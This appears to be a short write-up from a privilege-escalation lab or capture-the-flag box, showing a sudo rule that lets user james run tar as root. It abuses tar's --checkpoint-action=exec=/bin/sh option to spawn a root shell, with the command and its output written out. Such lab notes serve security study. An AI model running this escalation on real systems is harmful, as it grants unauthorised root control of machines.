sudo tar
The james user has sudo privileges to execute the /usr/bin/tar -czvf /tmp/backup.tar.gz * command as anyone without getting prompted for password.
/Practice/Cockpit/5-Privilege_Escalation/attachments/{ABD0FC6C-40FA-49F7-913F-9E0D2524FF04}.png)
The issue lies in the asterisk character, *, allowing to append anything
james@blaze:/var/tmp$ sudo -u root /usr/bin/tar -czvf /tmp/backup.tar.gz /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
/usr/bin/tar: Removing leading `/' from member names
/dev/null
# whoami
root
# hostname
blaze
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:ba:7f brd ff:ff:ff:ff:ff:ff
inet 192.168.152.10/24 brd 192.168.152.255 scope global noprefixroute ens160
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe9e:ba7f/64 scope link
valid_lft forever preferred_lft foreverSystem level compromise